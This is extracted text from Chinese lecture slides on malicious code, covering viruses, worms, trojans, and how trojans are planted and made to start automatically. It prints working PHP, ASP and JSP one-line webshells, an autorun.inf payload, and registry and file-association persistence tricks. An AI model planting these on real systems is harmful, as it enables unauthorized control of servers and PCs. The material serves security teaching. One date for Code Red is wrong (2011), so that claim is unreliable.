版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
第十四章惡意代碼內(nèi)容提綱2木馬的工作原理3木馬隱藏技術(shù)4惡意代碼概述1惡意代碼檢測(cè)與防御一、定義惡意代碼(maliciouscode):執(zhí)行惡意功能的計(jì)算機(jī)代碼不同廠商(或?qū)W術(shù)機(jī)構(gòu))在惡意代碼的分類(lèi)(一般都包括病毒、蠕蟲(chóng)和木馬,其它的則有所不同)和定義上有所不同不同時(shí)間段內(nèi),惡意代碼的分類(lèi)和定義也會(huì)有變化惡意代碼美國(guó)科恩博士(最早定義):計(jì)算機(jī)病毒是一種計(jì)算機(jī)程序,它通過(guò)修改其他程序把自己的一個(gè)拷貝或演化的拷貝插入到其他程序中實(shí)施感染傳染特性,即病毒可以自我繁殖演化特性,即病毒在感染過(guò)程中可以改變自身的一些特征,以逃避查殺計(jì)算機(jī)病毒賽門(mén)鐵克PeterSzor給出定義:計(jì)算機(jī)病毒是一種計(jì)算機(jī)程序,它遞歸地、明確地復(fù)制自己或其演化體?!懊鞔_遞歸”來(lái)區(qū)別病毒與正常程序的復(fù)制過(guò)程,“遞歸”反映了一個(gè)文件在被病毒感染以后會(huì)進(jìn)一步感染其他文件,“明確”強(qiáng)調(diào)了自我復(fù)制是病毒的主要功能。計(jì)算機(jī)病毒《中華人民共和國(guó)計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》(1994.2.18)的第二十八條:“計(jì)算機(jī)病毒,是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù),影響計(jì)算機(jī)使用,并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。計(jì)算機(jī)病毒幾個(gè)典型特性傳染性潛伏性可觸發(fā)性寄生性非授權(quán)執(zhí)行性破壞性計(jì)算機(jī)病毒典型計(jì)算機(jī)病毒基于功能模塊引導(dǎo)模塊搜索模塊感染模塊表現(xiàn)模塊標(biāo)識(shí)模塊計(jì)算機(jī)病毒計(jì)算機(jī)蠕蟲(chóng)(Worm):一種可以獨(dú)立運(yùn)行,并通過(guò)網(wǎng)絡(luò)傳播的惡性代碼。具有計(jì)算機(jī)病毒的一些特性,如傳播性、隱蔽性、破壞性等,但蠕蟲(chóng)也具有自己的特點(diǎn),如漏洞依賴(lài)性等,需要通過(guò)網(wǎng)絡(luò)系統(tǒng)漏洞進(jìn)行傳播,另外蠕蟲(chóng)也不需要宿主文件,有的蠕蟲(chóng)甚至只存在于內(nèi)存中計(jì)算機(jī)蠕蟲(chóng)典型計(jì)算機(jī)蠕蟲(chóng)基于功能模塊搜索模塊攻擊模塊傳輸模塊負(fù)載模塊控制模塊計(jì)算機(jī)蠕蟲(chóng)計(jì)算機(jī)木馬RFC1244(RequestforComments:1244)中是這樣描述木馬的:
“木馬是一種程序,它能提供一些有用的,或是僅僅令人感興趣的功能,但是它還有用戶所不知道的其他功能,例如在你不了解的情況下拷貝文件或竊取你的密碼?!?/p>
計(jì)算機(jī)木馬RFC1244的定義可以澄清一些模糊概念:首先木馬程序并不一定實(shí)現(xiàn)某種對(duì)用戶來(lái)說(shuō)有意義或有幫助的功能,但卻會(huì)實(shí)現(xiàn)一些隱藏的、危險(xiǎn)的功能;其次木馬所實(shí)現(xiàn)的主要功能并不為受害者所知,只有程序編制者最清楚。第三,這個(gè)定義暗示“有效負(fù)載”是惡意的。計(jì)算機(jī)木馬目前,大多數(shù)安全專(zhuān)家統(tǒng)一認(rèn)可的定義是:木馬是一段能實(shí)現(xiàn)有用的或必需的功能的程序,但是同時(shí)還完成一些不為人知的功能。計(jì)算機(jī)木馬木馬程序具有很大的危害性,主要表現(xiàn)在:自動(dòng)搜索已中木馬的計(jì)算機(jī);管理對(duì)方資源,如復(fù)制文件、刪除文件、查看文件內(nèi)容、上傳文件、下載文件等;跟蹤監(jiān)視對(duì)方屏幕;直接控制對(duì)方的鍵盤(pán)、鼠標(biāo);隨意修改注冊(cè)表和系統(tǒng)文件;共享被控計(jì)算機(jī)的硬盤(pán)資源;監(jiān)視對(duì)方任務(wù)且可終止對(duì)方任務(wù);遠(yuǎn)程重啟和關(guān)閉機(jī)器。計(jì)算機(jī)木馬從木馬所實(shí)現(xiàn)的功能角度可分為:破壞型密碼發(fā)送型遠(yuǎn)程訪問(wèn)型鍵盤(pán)記錄木馬DoS攻擊木馬代理木馬反彈端口型木馬從木馬形態(tài)上分,可以分為有文件木馬和無(wú)文件木馬有文件木馬:木馬本身是一個(gè)可執(zhí)行文件無(wú)文件木馬:木馬不是一個(gè)可執(zhí)行文件,需要依靠其它軟件來(lái)觸發(fā)執(zhí)行計(jì)算機(jī)木馬無(wú)文件木馬:木馬不是一個(gè)獨(dú)立可執(zhí)行的文件,而是通過(guò)特定方式隱藏在其它文件中,通過(guò)其它軟件來(lái)觸發(fā)執(zhí)行。例如:Office文檔中的宏;一段可解釋執(zhí)行的語(yǔ)言代碼,如Java、Python代碼段;Shell腳本;配置文件中一段腳本;注冊(cè)表中的一個(gè)鍵值等。通常功能比較簡(jiǎn)單,只是攻擊的第一步,執(zhí)行后再下載更多的攻擊代碼到目標(biāo)機(jī)器中計(jì)算機(jī)木馬計(jì)算機(jī)木馬一句話木馬是指只有一行代碼的木馬,利用Web編程語(yǔ)言(asp、php、jsp、aspx)的某個(gè)函數(shù)來(lái)執(zhí)行攻擊命令,也稱(chēng)為webshell。PHP一句話木馬示例:<?phpeval($_POST[sb])?><?phpassert($_POST[sb]);?><?$_POST['sa']($_POST['sb'],$_POST['sc'])?><?php@eval($_POST['cmd']);?>計(jì)算機(jī)木馬木馬ASP一句話木馬示例:<%evalrequest("sb")%><%executerequest("sb")%><%'<%loop<%:%><%executerequest("sb")%><%ExecuteGlobalrequest("sb")%>JSP一句話木馬示例:<%
if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>微軟表示,在2020年8月至2021年1月期間,每月檢測(cè)到大約14萬(wàn)個(gè)網(wǎng)絡(luò)惡意shell,相比去年報(bào)告的7.7萬(wàn)個(gè),幾乎翻了一倍其它:一句話木馬討論:一句話木馬是不是無(wú)文件木馬?計(jì)算機(jī)木馬病毒、蠕蟲(chóng)、木馬的區(qū)別惡意代碼二、惡意代碼概念的演變2000年以前:病毒時(shí)代背景:DOS退場(chǎng),Windows9x/NT廣泛應(yīng)用,促進(jìn)了網(wǎng)絡(luò)應(yīng)用進(jìn)入日常生活中在DOS時(shí)代,感染式病毒(Virus)、蠕蟲(chóng)(Worm)和特洛伊木馬(Trojan),都是相對(duì)窄而互斥的技術(shù)概念:Virus是主流惡意代碼概念的發(fā)展史2000~2005:蠕蟲(chóng)大爆發(fā)時(shí)代Happy99蠕蟲(chóng)利用劫持電子郵件的方式傳播并快速流行,拉開(kāi)了蠕蟲(chóng)時(shí)代大幕2011年:紅色代碼(CodeRed)及其變種“紅色代碼II”(CodeRedII)大爆發(fā):掃描溢出型蠕蟲(chóng)的典型代表惡意代碼概念的發(fā)展史2005~2010:木馬泛濫時(shí)代隨著端系統(tǒng)的安全性的提高(DEP、ALSR等技術(shù)的應(yīng)用),蠕蟲(chóng)的影響開(kāi)始減弱2005年,以灰鴿子、冰河為代表的遠(yuǎn)程控制程序在技術(shù)上趨于成熟,感染數(shù)量持續(xù)增加2007~2009:地下經(jīng)濟(jì)運(yùn)作日趨“成熟”,基于木馬的黑色產(chǎn)業(yè)鏈2007年上半年:毒王“AV終結(jié)者”惡意代碼概念的發(fā)展史2010~2020:虛擬貨幣和隱秘網(wǎng)絡(luò)帶動(dòng)的勒索新對(duì)抗2013年開(kāi)始,勒索軟件、挖礦木馬逐步泛濫2016:Mirai爆發(fā),致癱Dyn2017:WannaCry全球大爆發(fā)2019:WannaMine挖礦木馬爆發(fā)惡意代碼概念的發(fā)展史傳統(tǒng)意義上的病毒越來(lái)越少,當(dāng)前主流惡意代碼形式是木馬(占絕大多數(shù))和蠕蟲(chóng)不同惡意代碼形式的界限越來(lái)越模糊,采用的技術(shù)有融合的趨勢(shì)惡意代碼360惡意代碼惡意代碼種類(lèi)
2007年下半年新增病毒的比例(瑞星)惡意代碼種類(lèi)
2018年CNCERT中國(guó)互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告惡意代碼種類(lèi)
2019年CNCERT中國(guó)互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告惡意代碼種類(lèi)
2019年CNCERT中國(guó)互聯(lián)網(wǎng)網(wǎng)絡(luò)安全報(bào)告內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼概述1惡意代碼檢測(cè)與防御遠(yuǎn)程控制木馬木馬體系結(jié)構(gòu):C/S架構(gòu),木馬程序+控制端程序木馬程序即是服務(wù)器端程序??刂贫顺绦蜃鳛榭蛻舳?,用于攻擊者遠(yuǎn)程控制被植入木馬的機(jī)器。遠(yuǎn)程控制木馬與遠(yuǎn)程控制軟件的區(qū)別?隱蔽性:木馬被隱藏,避免被發(fā)現(xiàn);非授權(quán)性:木馬程序不經(jīng)授權(quán)控制主機(jī)遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過(guò)程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制配置木馬:通信配置:監(jiān)聽(tīng)端口、DNS、IP等功能配置:文件讀取、鍵盤(pán)監(jiān)聽(tīng)、截屏等安裝配置:安裝路徑、文件名、是否刪除安裝文件、注冊(cè)表啟動(dòng)項(xiàng)等配置木馬案例:冰河木馬的配置界面配置木馬遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過(guò)程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制傳播木馬:木馬植入木馬植入技術(shù)可以大概分為主動(dòng)植入與被動(dòng)植入兩類(lèi)。主動(dòng)植入:攻擊者主動(dòng)將木馬程序種到本地或者是遠(yuǎn)程主機(jī)上,這個(gè)行為過(guò)程完全由攻擊者主動(dòng)掌握。被動(dòng)植入:攻擊者預(yù)先設(shè)置某種環(huán)境,然后被動(dòng)等待目標(biāo)系統(tǒng)用戶的某種可能的操作,只有這種操作執(zhí)行,木馬程序才有可能植入目標(biāo)系統(tǒng)。1、主動(dòng)植入主動(dòng)植入一般需要通過(guò)某種方法獲取目標(biāo)主機(jī)的一定權(quán)限,然后由攻擊者自己動(dòng)手進(jìn)行安裝。按照目標(biāo)系統(tǒng)是本地還是遠(yuǎn)程的區(qū)分,這種方法又有本地安裝與遠(yuǎn)程安裝之分。1、主動(dòng)植入由于在一個(gè)系統(tǒng)植入木馬,不僅需要將木馬程序上傳到目標(biāo)系統(tǒng),還需要在目標(biāo)系統(tǒng)運(yùn)行木馬程序,所以主動(dòng)植入需要具有目標(biāo)系統(tǒng)的寫(xiě)權(quán)限和可執(zhí)行權(quán)限。如果僅僅具有寫(xiě)權(quán)限,只能將木馬程序上傳但不能執(zhí)行,這種情況屬于被動(dòng)植入,因?yàn)槟抉R仍然需要被動(dòng)等待以某種方式被執(zhí)行。(1)本地安裝本地安裝就是直接在本地主機(jī)上進(jìn)行安裝。一個(gè)人很難確保除了自己之外自己的計(jì)算機(jī)不會(huì)被其他人使用。而在經(jīng)常更換使用者的公共場(chǎng)所(如網(wǎng)吧、飯店、賓館、咖啡店等)的計(jì)算機(jī)上,這種安裝木馬的方法更是非常普遍、有效。(2)遠(yuǎn)程安裝遠(yuǎn)程安裝就是通過(guò)常規(guī)攻擊手段獲得目標(biāo)主機(jī)的一定權(quán)限后,將木馬上傳到目標(biāo)主機(jī)上,并使其運(yùn)行起來(lái)。例如,某些系統(tǒng)漏洞的存在,使得攻擊者可以利用漏洞遠(yuǎn)程將木馬程序上傳并執(zhí)行。從實(shí)現(xiàn)方式上,主要分為:利用系統(tǒng)自身漏洞植入利用第三方軟件漏洞植入(3)利用系統(tǒng)自身漏洞植入這是一種主動(dòng)攻擊的方式。攻擊者利用所了解的系統(tǒng)的安全漏洞及其特性主動(dòng)出擊。如IIS服務(wù)器的溢出漏洞,通過(guò)一個(gè)“IISHack”的攻擊程序就可使IIS服務(wù)器崩潰,并同時(shí)在被攻擊服務(wù)器執(zhí)行“木馬”程序。MIME漏洞則是利用InternetExplorer在處理不正常的MIME類(lèi)型存在的問(wèn)題,攻擊者有意地更改MIME類(lèi)型,使IE可以不提示用戶而直接運(yùn)行電子郵件附件中的惡意程序等。(4)利用第三方軟件漏洞植入每臺(tái)主機(jī)上都會(huì)安裝一些第三方軟件或者提供服務(wù),但是這些軟件可能存在可被利用的漏洞,如果被惡意者利用,你的主機(jī)就可以成為木馬的“棲息地”。例如:AT-TFTPServer在處理帶有超長(zhǎng)文件名參數(shù)的請(qǐng)求時(shí)存在漏洞,遠(yuǎn)程攻擊者可能利用此漏洞在服務(wù)器上執(zhí)行任意指令。2、被動(dòng)植入被動(dòng)植入主要是利用以下方式將木馬程序植入目標(biāo)系統(tǒng):網(wǎng)頁(yè)瀏覽植入利用電子郵件植入利用網(wǎng)絡(luò)下載植入利用即時(shí)通工具植入與其它程序捆綁利用移動(dòng)存儲(chǔ)設(shè)備植入(1)網(wǎng)頁(yè)瀏覽植入網(wǎng)頁(yè)瀏覽傳播:利用Script/ActiveX控件/JavaApplet等編寫(xiě)出一個(gè)HTML網(wǎng)頁(yè),當(dāng)我們?yōu)g覽該頁(yè)面時(shí),會(huì)在后臺(tái)將木馬程序下載到計(jì)算機(jī)緩存中,然后修改系統(tǒng)注冊(cè)表,使相關(guān)鍵值指向“木馬”程序。還可以利用瀏覽器的已知或者未知的漏洞,把木馬下載到本機(jī)并運(yùn)行。水坑攻擊(Wateringhole):在受害者必經(jīng)之路設(shè)置一個(gè)“水坑(陷阱)”。最常見(jiàn)的做法是,黑客分析攻擊目標(biāo)的上網(wǎng)活動(dòng)規(guī)律,尋找攻擊目標(biāo)經(jīng)常訪問(wèn)的網(wǎng)站的弱點(diǎn),先將此網(wǎng)站“攻破”并植入攻擊代碼,一旦攻擊目標(biāo)訪問(wèn)該網(wǎng)站就會(huì)“中招”(2)水坑攻擊2020.2.19:黑客利用后門(mén)對(duì)香港iOS用戶發(fā)起水坑攻擊(2)水坑攻擊威瑞森的報(bào)告顯示,94%的惡意軟件通過(guò)電子郵件傳播,排名第一的社會(huì)工程攻擊是網(wǎng)絡(luò)釣魚(yú)(3)利用電子郵件植入(3)利用電子郵件植入電子郵件(E-mail)進(jìn)行傳播:攻擊者將“木馬”程序偽裝成E-mail附件的形式發(fā)送出去,收信人只要查看郵件附件就會(huì)使“木馬”程序得到運(yùn)行并安裝進(jìn)入系統(tǒng)。通過(guò)在郵件內(nèi)容內(nèi)嵌WSH(WindowsScriptsHost)腳本,用戶不需要打開(kāi)附件,僅僅瀏覽一下郵件的內(nèi)容,附件中的木馬就會(huì)被執(zhí)行。附件文檔中不包含惡意代碼,而是下載惡意代碼的鏈接例一例二惡意Office文件樣本不利用漏洞,也未包含可疑的宏或VBA等操作,而是單純的利用XML連接外部開(kāi)啟另一個(gè)惡意文件例三利用電子郵件植入(4)網(wǎng)絡(luò)下載植入一些非正規(guī)的網(wǎng)站以提供軟件下載為名,將木馬程序偽裝成用戶所希望的其它軟件,當(dāng)用戶下載安裝時(shí),實(shí)際上所安裝的是木馬程序。(5)利用即時(shí)通工具植入即時(shí)通工具有文件傳輸功能,所以現(xiàn)在也有很多木馬通過(guò)它傳播。攻擊者通常把木馬服務(wù)器程序通過(guò)合并軟件和其他的可執(zhí)行文件綁在一起,然后騙你說(shuō)是一個(gè)好玩的東東或者是漂亮MM的照片,你接受后運(yùn)行的話,你就成了木馬的犧牲品了。(6)與其它程序或文檔捆綁將木馬與其它軟件捆綁,用戶在下載安裝其它軟件時(shí)就不自覺(jué)地也安裝了木馬,這種情況下用戶很難察覺(jué)。攻擊者還可以在.doc、.ppt、.rar、.zip、.mpg、.pdf等文件中插入惡意代碼,當(dāng)用戶打開(kāi)這些文檔時(shí),就會(huì)被植入木馬。例:圖片木馬有一種圖片木馬,利用用戶認(rèn)為圖片文件不可執(zhí)行,因此不可能是木馬這樣的心理來(lái)欺騙受害者。實(shí)際上這是一個(gè)后綴名的小把戲。由于Windows系統(tǒng)默認(rèn)不顯示已經(jīng)注冊(cè)了的文件類(lèi)型的后綴名,因此test.jpg.exe這種文件在系統(tǒng)上就顯示為test.jpg,木馬再采用和圖片文件一樣的圖標(biāo),對(duì)大多數(shù)用戶而言,是極具欺騙性的。(7)利用移動(dòng)存儲(chǔ)設(shè)備植入利用移動(dòng)存儲(chǔ)設(shè)備傳播:利用Windows的Autoplay(autorun.inf)機(jī)制,當(dāng)插入U(xiǎn)盤(pán)、移動(dòng)硬盤(pán)或者光盤(pán)時(shí),可以自動(dòng)執(zhí)行惡意程序。[AutoRun]open=scvhost.exeshellexecute=scvhost.exeshell\Auto\command=scvhost.exe“擺渡”木馬①植入外網(wǎng)主機(jī)“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集⑤敏感信息轉(zhuǎn)移“擺渡”木馬①植入外網(wǎng)主機(jī)②植入移動(dòng)設(shè)備③植入內(nèi)網(wǎng)主機(jī)④敏感信息收集⑤敏感信息轉(zhuǎn)移⑥敏感信息泄露2015.12.2夜間:安天監(jiān)控預(yù)警體系感知到如下線索:某知名作家在新浪微博發(fā)布消息,曝光有人以發(fā)送“采訪提綱”為借口,利用微博私信功能,發(fā)送惡意代碼鏈接。(8)社會(huì)工程學(xué)2015.12.2夜間:安天監(jiān)控預(yù)警體系感知到如下線索:某知名作家在新浪微博發(fā)布消息,曝光有人以發(fā)送“采訪提綱”為借口,利用微博私信功能,發(fā)送惡意代碼鏈接。(8)社會(huì)工程學(xué)(8)社會(huì)工程學(xué)無(wú)論是原始微博截圖中的頭像、微博兩條搜索結(jié)果顯示的圖像,還是百度網(wǎng)盤(pán)的頭像,相似度都非常高,讓人真假難辨。(8)社會(huì)工程學(xué)幸運(yùn)的是,沒(méi)有微博名人中招?。?)社會(huì)工程學(xué)社會(huì)工程學(xué)(8)社會(huì)工程學(xué)通過(guò)云應(yīng)用投放惡意代碼遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過(guò)程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制自動(dòng)加載技術(shù)木馬程序在被植入目標(biāo)主機(jī)后,不可能寄希望于用戶雙擊其圖標(biāo)來(lái)運(yùn)行啟動(dòng),只能不動(dòng)聲色地自動(dòng)啟動(dòng)和運(yùn)行,攻擊才能以此為依據(jù)侵入被侵主機(jī),完成控制。自動(dòng)加載技術(shù)在Windows系統(tǒng)中木馬程序的自動(dòng)加載技術(shù)主要有:修改系統(tǒng)文件修改系統(tǒng)注冊(cè)表添加系統(tǒng)服務(wù)修改文件打開(kāi)關(guān)聯(lián)屬性修改任務(wù)計(jì)劃修改組策略利用系統(tǒng)自動(dòng)運(yùn)行的程序修改啟動(dòng)文件夾替換系統(tǒng)DLL(1)修改系統(tǒng)文件木馬程序一般會(huì)在第一次運(yùn)行時(shí),修改目標(biāo)系統(tǒng)文件以達(dá)到自動(dòng)加載的目的在早于WindwosXP版本的系統(tǒng)上,System.ini、Win.ini、Winstart.bat、Autoexec.bat等都是木馬所關(guān)注的配置文件。這些文件能自動(dòng)被Windows在啟動(dòng)時(shí)加載運(yùn)行,木馬將自身程序加入此類(lèi)批處理文件,能夠達(dá)成開(kāi)機(jī)啟動(dòng)的目標(biāo)。這些文件雖然在后續(xù)版本的Windows系統(tǒng)上依然存在,但主要出于兼容早期系統(tǒng)的需要,很難再被木馬繼續(xù)利用(2)修改系統(tǒng)注冊(cè)表系統(tǒng)注冊(cè)表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。在WinNT系列操作系統(tǒng)上,Windows主要使用注冊(cè)表存儲(chǔ)包括開(kāi)機(jī)啟動(dòng)項(xiàng)目的系統(tǒng)配置,修改注冊(cè)表隱蔽性相對(duì)較高,木馬常常采用這種方法實(shí)現(xiàn)開(kāi)機(jī)自啟動(dòng)。通常被攻擊者用作開(kāi)機(jī)啟動(dòng)的主鍵(在不同版本的系統(tǒng)中可能存在不同的主鍵)包括:(2)修改系統(tǒng)注冊(cè)表系統(tǒng)注冊(cè)表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx(在Win2000、WinXp中有效)、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中,HKEY_LOCAL_MACHINE對(duì)當(dāng)前系統(tǒng)的所有用戶有效,HKEY_CURRENT_USER僅對(duì)當(dāng)前登陸的用戶有效(2)修改系統(tǒng)注冊(cè)表系統(tǒng)注冊(cè)表保存著系統(tǒng)的軟件、硬件及其它與系統(tǒng)配置有關(guān)的重要信息。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx(在Win2000、WinXp中有效)、RunServices、RunServicesOnce等HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等HKEY_USERS\[UserSID]\Software\Microsoft\Windows\CurrentVersion\Run、Runonce、RunonceEx、RunServices、RunServicesOnce等在上述主鍵中,Runonce主鍵設(shè)置的自啟動(dòng)程序?qū)⒃谙乱淮蜗到y(tǒng)啟動(dòng)時(shí)獲得自動(dòng)運(yùn)行的機(jī)會(huì),并在運(yùn)行后從該主鍵移除。木馬程序如果利用這個(gè)主鍵進(jìn)行自啟動(dòng),則木馬的運(yùn)行通常有一個(gè)固定的操作,即需要在運(yùn)行后重新將自身加入到Runonce主鍵中,確保自己在每次系統(tǒng)啟動(dòng)時(shí)均獲得運(yùn)行機(jī)會(huì)(3)添加系統(tǒng)服務(wù)WindowsNT內(nèi)核操作系統(tǒng)都大量使用服務(wù)來(lái)實(shí)現(xiàn)關(guān)鍵的系統(tǒng)功能。一些木馬將自身注冊(cè)為系統(tǒng)服務(wù),并將相應(yīng)服務(wù)設(shè)置為系統(tǒng)開(kāi)機(jī)時(shí)自啟動(dòng)。例如,WindowsResourceKit工具包(其中包含的工具可能會(huì)根據(jù)用戶使用的Windows版本而有所不同)中的程序instsrv.exe常常被木馬用來(lái)創(chuàng)建系統(tǒng)服務(wù),服務(wù)的管理和配置可以通過(guò)程序sc.exe來(lái)實(shí)施。這樣每當(dāng)Windows系統(tǒng)啟動(dòng)時(shí),即使沒(méi)有用戶登錄,木馬也會(huì)自動(dòng)開(kāi)始工作。作為服務(wù)啟動(dòng)的木馬往往隱蔽性更強(qiáng),一般用戶很難從服務(wù)中找出木馬程序(4)修改文件打開(kāi)關(guān)聯(lián)屬性通常對(duì)于一些常用的文件如.txt文件,只要雙擊文件圖標(biāo)就能打開(kāi)這個(gè)文件。這是因?yàn)樵谙到y(tǒng)注冊(cè)表中,已經(jīng)把這類(lèi)文件與某個(gè)程序關(guān)聯(lián)起來(lái),只要用戶雙擊該類(lèi)文件,系統(tǒng)就自動(dòng)啟動(dòng)相關(guān)聯(lián)的程序來(lái)打開(kāi)文件。修改文件打開(kāi)關(guān)聯(lián)屬性是木馬程序的常用手段。比如:正常情況下.txt文件的打開(kāi)方式為notepad.exe文件,而木馬可能將這類(lèi)文件的關(guān)聯(lián)程序修改為木馬程序,這樣只要打開(kāi)此類(lèi)文件,就能在無(wú)意中啟動(dòng)木馬。案例:冰河木馬。例:冰河的自動(dòng)加載方法
HKEY_CLASSES_ROOT根鍵中記錄的是Windows操作系統(tǒng)中所有數(shù)據(jù)文件的信息,主要記錄不同文件的文件名后綴和與之對(duì)應(yīng)的應(yīng)用程序。
“冰河”就是通過(guò)修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的鍵值,將“C:\WINDOWS\NOTEPAD.EXE%1”
改為“C:\WINDOWS\SYSTEM\SYSEXPLR.EXE%1”,這樣一旦你雙擊一個(gè)TXT文件,原本應(yīng)用Notepad打開(kāi)該文件的,現(xiàn)在卻變成啟動(dòng)木馬程序了。
不同版本W(wǎng)indows系統(tǒng)的鍵名有差異!修改文件打開(kāi)關(guān)聯(lián)不僅僅是TXT文件,其它諸如HTM、ZIP、RAR等都是木馬的目標(biāo)。對(duì)付這類(lèi)木馬,只能經(jīng)常檢查HKEY_CLASSES_ROOT\文件類(lèi)型\shell\open\command主鍵,查看其鍵值是否正常。(5)修改任務(wù)計(jì)劃在默認(rèn)情況下,任務(wù)計(jì)劃程序隨Windows一起啟動(dòng)并在后臺(tái)運(yùn)行。如果把某個(gè)程序添加到計(jì)劃任務(wù)文件夾,并將計(jì)劃任務(wù)設(shè)置為“系統(tǒng)啟動(dòng)時(shí)”或“登錄時(shí)”,這樣也可以實(shí)現(xiàn)程序自啟動(dòng)。Windows10WindowsXP(6)修改組策略在“開(kāi)始”→“運(yùn)行”中輸入“gpedit.msc"。按回車(chē),打開(kāi)系統(tǒng)組策略窗口,選擇“計(jì)算機(jī)配置”→“管理模板”→“系統(tǒng)”→“登錄”,雙擊右邊的“在用戶登錄時(shí)運(yùn)行這些程序”項(xiàng)。(6)修改組策略(續(xù))打開(kāi)其屬性對(duì)話框,選擇“已啟用”,再單擊“顯示”,會(huì)彈出“顯示內(nèi)容”對(duì)話框,列表中顯示的便是藏身于此的自啟動(dòng)程序。如果你也想在這里添加自啟動(dòng)項(xiàng)目,可單擊“添加”在出現(xiàn)的“添加項(xiàng)目”對(duì)話框中輸入可執(zhí)行文件的完整路徑和文件名,“確定”即可。(7)修改啟動(dòng)文件夾當(dāng)前登陸用戶的“啟動(dòng)”文件夾這是許多應(yīng)用軟件自啟動(dòng)的常用位置。當(dāng)前登陸用戶的“啟動(dòng)”文件夾一般在:C:\DocumentsandSettings\<用戶名字>\「開(kāi)始」菜單\程序\啟動(dòng)\對(duì)所有用戶有效的啟動(dòng)文件夾不管用戶用什么身份登錄系統(tǒng),放入該文件夾的快捷方式總是自動(dòng)啟動(dòng)——這是它與用戶專(zhuān)有的啟動(dòng)文件夾的區(qū)別所在。該文件夾一般在:C:\DocumentsandSettings\AllUsers\「開(kāi)始」菜單\程序\啟動(dòng)\(8)利用系統(tǒng)自動(dòng)運(yùn)行的程序在Windows系統(tǒng)中,有很多程序是可以自動(dòng)運(yùn)行的,如:在對(duì)磁盤(pán)進(jìn)行格式化后,總是要運(yùn)行“磁盤(pán)掃描”程序(Scandisk.exe);按下F1鍵時(shí),系統(tǒng)將運(yùn)行Winhelp.exe或Hh.exe打開(kāi)幫助文件;系統(tǒng)啟動(dòng)時(shí),將自動(dòng)啟動(dòng)系統(tǒng)欄程序SysTray.exe、注冊(cè)表檢查程序scanreg.exe、計(jì)劃任務(wù)程序mstask.exe、輸入法程序、電源管理程序等。這為惡意程序提供了機(jī)會(huì),通過(guò)覆蓋相應(yīng)文件就可獲得自動(dòng)啟動(dòng)的機(jī)會(huì),而不必修改系統(tǒng)任何設(shè)置。(9)替換系統(tǒng)DLL這種方法通過(guò)APIHOOK啟動(dòng),也稱(chēng)為DLL陷阱技術(shù)。通過(guò)替換Windows系統(tǒng)中正常的DLL文件(動(dòng)態(tài)鏈接文件),如kernel32.dll和user32.dll這些隨系統(tǒng)一起啟動(dòng)的dll。啟動(dòng)之后,如果是系統(tǒng)正常的調(diào)用請(qǐng)求,它就把請(qǐng)求轉(zhuǎn)到原先的DLL進(jìn)行處理,如果是約定的木馬操作,則該DLL文件就實(shí)現(xiàn)木馬服務(wù)器端功能?,F(xiàn)代操作系統(tǒng)對(duì)此已有防護(hù),已很難實(shí)施有些木馬需要系統(tǒng)重啟后運(yùn)行或提升權(quán)限,如何做到?(10)其它遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過(guò)程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)程控制建立連接木馬控制端木馬服務(wù)端InternetIntranet控制流木馬的常規(guī)通信方式建立連接A控制端A服務(wù)端1037762676266016(1)建立連接前(2)獲取服務(wù)端IP(3)木馬連接建立通過(guò)信息反饋或IP掃描獲得服務(wù)器IP地址木馬端口(服務(wù)端IP)(控制端IP)服務(wù)端口遠(yuǎn)程控制木馬的反彈技術(shù)控制端感染木馬的主機(jī)優(yōu)點(diǎn):解決動(dòng)態(tài)IP地址的問(wèn)題;解決內(nèi)網(wǎng)地址的問(wèn)題;繞過(guò)防火墻的限制;缺點(diǎn):容易暴露控制端反彈遠(yuǎn)程控制木馬的運(yùn)行步驟遠(yuǎn)程控制木馬進(jìn)行網(wǎng)絡(luò)入侵的過(guò)程:配置木馬傳播木馬啟動(dòng)木馬建立連接遠(yuǎn)